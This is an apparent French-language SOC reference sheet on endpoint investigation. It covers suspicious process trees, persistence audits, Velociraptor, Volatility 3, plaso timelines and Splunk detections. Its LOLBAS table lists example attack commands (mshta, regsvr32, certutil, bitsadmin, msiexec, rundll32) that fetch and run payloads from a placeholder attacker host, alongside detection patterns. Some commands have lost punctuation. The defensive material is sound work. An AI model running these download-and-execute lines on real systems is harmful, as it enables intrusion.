MDstable
NoteSnippetChecklistPlaybook

Investigation endpoint — EDR & Artefacts

Analyser les artefacts endpoint : processus, persistance, mémoire, timeline

snippetadvanced 2025-05-13 5 min read
socendpointEDRprocesspersistencememoryDFIR

Arbres de processus suspects

| Pattern | Signification | ATT&CK | |---|---|---| | WINWORD.EXE → powershell.exe | Macro Office malveillante | T1566.001, T1059.001 | | EXCEL.EXE → cmd.exe → net.exe | Macro téléchargeant payload | T1059.003 | | outlook.exe → wscript.exe | Pièce jointe script malveillant | T1566.001 | | explorer.exe → cmd.exe → net.exe | Exécution manuelle par attaquant | T1059.003 | | lsass.exe → [tout enfant] | Injection dans lsass (très rare légitime) | T1055 | | svchost.exe → powershell.exe | Service malveillant ou WMI exec | T1047, T1059.001 | | msiexec.exe → rundll32.exe → regsvr32.exe | Chaîne LOLBAS | T1218 | | wscript.exe → powershell.exe -enc | Script VBS dropper | T1059.005 | | regsvr32.exe /s /u /i:http://... | Squiblydoo bypass | T1218.010 |

Commandes d'investigation processus

Windows

powershell
Variables
{{SUSPICIOUS_DLL}}
# Liste des processus avec path et hash
Get-Process | Select-Object Name, Id, Path, @{
  N='Hash'; E={(Get-FileHash $_.Path -EA 0).Hash}
} | Where-Object Path -ne $null | Format-Table -Auto
# Processus avec connexions réseau actives
Get-NetTCPConnection -State Established | ForEach-Object {
  $proc = Get-Process -Id $_.OwningProcess -EA 0
  [PSCustomObject]@{
    LocalAddr  = $_.LocalAddress
    LocalPort  = $_.LocalPort
    RemoteAddr = $_.RemoteAddress
    RemotePort = $_.RemotePort
    PID        = $_.OwningProcess
    Process    = $proc.Name
    Path       = $proc.Path
  }
} | Format-Table -Auto
# Arbre de processus complet
Get-WmiObject Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine |
  Sort-Object ParentProcessId | Format-Table -Auto
# Processus injectés — modules inhabituels
tasklist /m /fi "STATUS eq running" | findstr /i "{{SUSPICIOUS_DLL}}"
cmd
REM Investigation rapide ligne de commande
tasklist /v /fo csv > c:\temp\tasklist.csv
wmic process get ProcessId,ParentProcessId,Name,CommandLine /format:csv > c:\temp\processes.csv
netstat -nao > c:\temp\netstat.csv

Linux

bash
Variables
{{PID}}
# Processus suspects — parents/enfants
ps auxf --sort=-%cpu | head -40
# Processus avec connexions réseau
ss -tulnp | awk '{print $NF}' | grep -oP 'pid=\K[0-9]+' | 
  xargs -I{} sh -c 'echo "PID: {}"; ls -la /proc/{}/exe 2>/dev/null'
# Processus sans binaire sur disque (fileless)
for pid in ls /proc | grep -E '^[0-9]+$'; do
  exereadlink /proc/$pid/exe 2>/dev/null
  if echo "$exe" | grep -q "(deleted)"; then
    echo "DELETED: PID=$pid EXE=$exe CMD=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')"
  fi
done
# Fichiers ouverts par un processus suspect
lsof -p {{PID}} 2>/dev/null | grep -v "REG\|DIR" | head -30

Checklist — Persistance

Checklist0/12
powershell
# Audit persistance — Run keys
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
# WMI subscriptions — persistance avancée (T1546.003)
Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumer
Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBinding
# Scheduled Tasks — contenu complet
Get-ScheduledTask | Where-Object State -ne "Disabled" |
  ForEach-Object { $_.Actions } | Select-Object Execute, Arguments |
  Where-Object { $_.Execute -match "powershell|cmd|wscript|mshta|regsvr" }

Velociraptor / EDR — Collecte d'artefacts

yaml
# Velociraptor — Query VQL pour investigation endpoint
SELECT *
FROM Artifact.Windows.System.Pslist()
WHERE CommandLine =~ "(?i)(base64|enc|http|Download)"
# Collecte de tous les artefacts de persistance
SELECT * FROM Artifact.Windows.Persistence.PermanentWMIEvents()
SELECT * FROM Artifact.Windows.System.ScheduledTasks()
SELECT * FROM Artifact.Windows.Registry.RunKeys()
bash
Variables
{{FALCON_TOKEN}}
{{DEVICE_ID}}
# EDR CLI — Isoler un hôte (exemple CrowdStrike Falcon)
# Via API Falcon
curl -X POST "https://api.crowdstrike.com/devices/entities/devices-actions/v2?action_name=contain" 
  -H "Authorization: Bearer {{FALCON_TOKEN}}" 
  -H "Content-Type: application/json" 
  -d '{"ids": ["{{DEVICE_ID}}"]}'

Forensique mémoire — Volatility 3

bash
Variables
{{PID}}
# Volatility3 — Installation et usage de base
pip install volatility3
# Image mémoire — liste des processus
volpy -f memorydmp windowspslist
# Arbre de processus
volpy -f memorydmp windowspstree
# Connexions réseau en mémoire
volpy -f memorydmp windowsnetscan
# Détection de code injecté (MZ headers dans régions non-image)
volpy -f memorydmp windowsmalfind --pid {{PID}}
# DLLs chargées par un processus
volpy -f memorydmp windowsdlllist --pid {{PID}}
# Dumps des processus suspects
volpy -f memorydmp windowsmemmap --pid {{PID}} --dump
# Analyse des handles ouverts
volpy -f memorydmp windowshandles --pid {{PID}}
# Recherche de strings dans la mémoire d'un processus
volpy -f memorydmp windowsstrings --pid {{PID}} | grep -iE "(http|cmd|powershell|VirtualAlloc)"

Timeline — plaso / log2timeline

bash
Variables
{{START_DATE}}
{{END_DATE}}
# Créer une timeline complète d'un système Windows (image disque)
log2timelinepy --parsers win7winreg 
  /output/timeline.plaso 
  /mnt/evidence/image.dd
# Filtrer et exporter au format CSV
psortpy -o l2tcsv 
  -w /output/timeline.csv 
  /output/timeline.plaso 
  "date > '{{START_DATE}}' and date < '{{END_DATE}}'"
# Recherche rapide d'événements suspects
grep -i "powershell\|psexec\|mimikatz\|lsass" /output/timeline.csv | head -50

LOLBAS — Détection des abus

| Binaire | Technique d'abus | Commande suspecte | ATT&CK | |---|---|---|---| | mshta.exe | Exécution HTA/VBS | mshta http://{{LHOST}}/evil.hta | T1218.005 | | regsvr32.exe | Squiblydoo — DLL distante | regsvr32 /s /u /i:http://{{LHOST}}/evil.sct scrobj.dll | T1218.010 | | certutil.exe | Download de payload | certutil -urlcache -split -f http://{{LHOST}}/payload.exe | T1105 | | bitsadmin.exe | Download persistant | bitsadmin /transfer job http://{{LHOST}}/evil.exe c:\tmp\evil.exe | T1197 | | wscript.exe | Exécution de scripts | wscript //e:VBScript //b evil.js | T1059.005 | | rundll32.exe | Exécution DLL | rundll32 \\{{LHOST}}\share\evil.dll,DllMain | T1218.011 | | msiexec.exe | Install MSI distant | msiexec /q /i http://{{LHOST}}/evil.msi | T1218.007 | | odbcconf.exe | Proxy d'exécution | odbcconf /s /a {REGSVR evil.dll} | T1218.008 |

splunk
# Splunk — Détection LOLBAS avec arguments réseau
index=windows EventCode=4688 earliest=-24h
  (NewProcessName="*certutil*" AND CommandLine="*http*")
  OR (NewProcessName="*mshta*" AND (CommandLine="*http*" OR CommandLine="*\\\\*"))
  OR (NewProcessName="*regsvr32*" AND CommandLine="*scrobj*")
  OR (NewProcessName="*bitsadmin*" AND CommandLine="*transfer*")
  OR (NewProcessName="*rundll32*" AND CommandLine="*\\\\*")
| table _time, host, SubjectUserName, NewProcessName, CommandLine
| sort _time
💡 Tip — Vérifier le niveau d'intégrité du processus parent — un enfant de niveau "Medium Integrity" généré par un processus "High Integrity" est normal lors d'une élévation, mais l'inverse (un enfant High issu d'un parent Medium sans UAC visible) est un marqueur d'escalade de privilèges non-standard à investiguer immédiatement.
OPS·BRAIN v1.075 notes · Securitylocal